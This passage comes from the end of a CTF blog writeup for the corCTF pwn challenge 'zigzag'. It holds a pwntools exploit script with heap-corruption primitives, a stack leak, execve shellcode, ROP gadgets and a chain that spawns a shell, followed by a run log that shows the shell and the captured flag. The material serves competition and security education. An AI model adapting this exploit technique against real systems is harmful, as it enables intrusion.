class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>, <span class="number">5</span>):</span><br><span class="line">    alloc(i, <span class="number">1000</span>, <span class="string">b&quot;vv&quot;</span>)</span><br><span class="line"></span><br><span class="line">edit(<span class="number">4</span>, <span class="number">0x400</span> + <span class="number">5</span>*<span class="number">8</span>, <span class="string">b&quot;X&quot;</span>*<span class="number">0x400</span> + pwn.p64(<span class="number">0x208000</span>)*<span class="number">3</span> + pwn.p64(<span class="number">0x000</span>) + pwn.p64(<span class="number">0</span>))</span><br><span class="line"></span><br><span class="line">alloc(<span class="number">5</span>, <span class="number">1000</span>, <span class="string">b&quot;A&quot;</span>)</span><br><span class="line">show(<span class="number">5</span>)</span><br><span class="line">io.recv(<span class="number">0x100</span>)</span><br><span class="line"></span><br><span class="line">stack = pwn.u64(io.recv(<span class="number">8</span>))</span><br><span class="line">pwn.log.info(<span class="string">f&quot;stack: <span class="subst">&#123;<span class="built_in">hex</span>(stack)&#125;</span>&quot;</span>)</span><br><span class="line"></span><br><span class="line">edit(<span class="number">4</span>, <span class="number">0x400</span> + <span class="number">5</span>*<span class="number">8</span>, <span class="string">b&quot;A&quot;</span>*<span class="number">0x400</span> + pwn.p64(<span class="number">0x208000</span>)*<span class="number">3</span> + pwn.p64(<span class="number">0x000</span>) + pwn.p64(<span class="number">0</span>))</span><br><span class="line"></span><br><span class="line">shellcode = <span class="string">b&quot;\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05&quot;</span></span><br><span class="line"></span><br><span class="line">alloc(<span class="number">14</span>, <span class="number">1000</span>, shellcode)</span><br><span class="line"></span><br><span class="line"><span class="string">&quot;&quot;&quot;</span></span><br><span class="line"><span class="string">0x0000000000201fcf : pop rax ; syscall</span></span><br><span class="line"><span class="string">0x0000000000203147 : pop rdi ; ret</span></span><br><span class="line"><span class="string">0x000000000020351b : pop rsi ; ret</span></span><br><span class="line"><span class="string">0x00000000002035cf : xor edx, edx ; mov rsi, qword ptr [r9] ; xor eax, eax ; syscall</span></span><br><span class="line"><span class="string">0x0000000000201e09 : ret</span></span><br><span class="line"><span class="string">0x0000000000203715 : add rsp, 0x68 ; pop rbx ; pop r14 ; ret</span></span><br><span class="line"><span class="string">&quot;&quot;&quot;</span></span><br><span class="line"></span><br><span class="line">rop = pwn.ROP(exe)</span><br><span class="line">binsh = <span class="number">0x208000</span>+(<span class="number">48</span>)</span><br><span class="line">rop.execve(binsh, <span class="number">0</span>, <span class="number">0</span>)</span><br><span class="line"></span><br><span class="line">edit(<span class="number">4</span>, <span class="number">0x400</span> + <span class="number">5</span>*<span class="number">8</span>, <span class="string">b&quot;A&quot;</span>*<span class="number">0x400</span> + pwn.p64(stack-<span class="number">0x50</span>)* <span class="number">3</span> + pwn.p64(<span class="number">0</span>) + pwn.p64(<span class="number">0</span>))</span><br><span class="line">alloc(<span class="number">11</span>, <span class="number">0x400</span>, pwn.p64(<span class="number">0x203147</span>) + pwn.p64(<span class="number">0x208000</span>) + pwn.p64(<span class="number">0x20351b</span>) + pwn.p64(<span class="number">0x1000</span>) + pwn.p64(<span class="number">0x201fcf</span>) + pwn.p64(<span class="number">0xa</span>) + pwn.p64(<span class="number">0x208000</span>))</span><br><span class="line"></span><br><span class="line">edit(<span class="number">4</span>, <span class="number">0x400</span> + <span class="number">5</span>*<span class="number">8</span>, <span class="string">b&quot;A&quot;</span>*<span class="number">0x400</span> + pwn.p64(stack-<span class="number">0xd0</span>)* <span class="number">3</span> + pwn.p64(<span class="number">0</span>) + pwn.p64(<span class="number">0</span>))</span><br><span class="line"></span><br><span class="line">alloc(<span class="number">12</span>, <span class="number">1000</span>,pwn.p64(<span class="number">0x202d16</span>))</span><br><span class="line">edit(<span class="number">12</span>, <span class="number">0x7</span>, pwn.p64(<span class="number">0x0000000000203715</span>))</span><br><span class="line"></span><br><span class="line">io.interactive()</span><br><span class="line"></span><br><span class="line"><span class="string">&quot;&quot;&quot;</span></span><br><span class="line"><span class="string">nasm@off:~/Documents/pwn/corCTF/zieg$ python3 remote.py REMOTE HOST=be.ax PORT=31278</span></span><br><span class="line"><span class="string">[*] &#x27;/home/nasm/Documents/pwn/corCTF/zieg/zigzag&#x27;</span></span><br><span class="line"><span class="string">    Arch:     amd64-64-little</span></span><br><span class="line"><span class="string">    RELRO:    No RELRO</span></span><br><span class="line"><span class="string">    Stack:    No canary found</span></span><br><span class="line"><span class="string">    NX:       NX enabled</span></span><br><span class="line"><span class="string">    PIE:      No PIE (0x200000)</span></span><br><span class="line"><span class="string">[+] Opening connection to be.ax on port 31278: Done</span></span><br><span class="line"><span class="string">[*] stack: 0x7ffe21d2cc68</span></span><br><span class="line"><span class="string">[*] Loaded 37 cached gadgets for &#x27;zigzag&#x27;</span></span><br><span class="line"><span class="string">[*] Using sigreturn for &#x27;SYS_execve&#x27;</span></span><br><span class="line"><span class="string">[*] Switching to interactive mode</span></span><br><span class="line"><span class="string">$ id</span></span><br><span class="line"><span class="string">uid=1000(ctf) gid=1000(ctf) groups=1000(ctf)</span></span><br><span class="line"><span class="string">$ cat flag.txt</span></span><br><span class="line"><span class="string">corctf&#123;bl4Z1nGlY_f4sT!!&#125;</span></span><br><span class="line"><span class="string">&quot;&quot;&quot;</span></span><br></pre></td></tr></table></figure>
        
      </div>

         
    </div>
    
     
  </div>
  
    
<nav id="article-nav">
  <a class="article-nav-btn left "
    
      href="/posts/babyfile/"
      title="[SECCON CTF 2022 Quals] babyfile"
     >
    <i class="fa-solid fa-angle-left"></i>
    <p class="title-text">
      
        [SECCON CTF 2022 Quals] babyfile
        
    </p>
  </a>
  <a class="article-nav-btn right "
    
      href="/posts/cshell2/"
      title="[corCTF 2022 - pwn] cshell2"
     >

    <p class="title-text">
      
        [corCTF 2022 - pwn] cshell2
        
    </p>
    <i class="fa-solid fa-angle-right"></i>
  </a>
</nav>


  
</article>

 
    </div>
    <div id="footer-wrapper">
      <footer id="footer">
  
  <div id="footer-info" class="inner">
    
    &copy; 2023 nasm<br>
    Powered by <a href="https://hexo.io/" target="_blank">Hexo</a> & Theme <a target="_blank" rel="noopener" href="https://github.com/saicaca/hexo-theme-vivia">Vivia</a>
  </div>
</footer>

    </div>
    <div class="back-to-top-wrapper">
    <button id="back-to-top-btn" class="back-to-top-btn" onclick="topFunction()">
        <span class="material-symbols-rounded">keyboard_arrow_up</span>
    </button>
</div>

<script>
    function topFunction() {
        window.scroll({ top: 0, behavior: 'smooth' });
    }
    let btn = document.getElementById('back-to-top-btn');
    function scrollFunction() {
        if (document.body.scrollTop > 600 || document.documentElement.scrollTop > 600) {
            btn.style.opacity = 1;
        } else {
            btn.style.opacity = 0;
        }
    }
    window.onscroll = function() {
        scrollFunction();
    }
</script>

  </div>
  <script src="/js/light-dark-switch.js"></script>
</body>
</html>
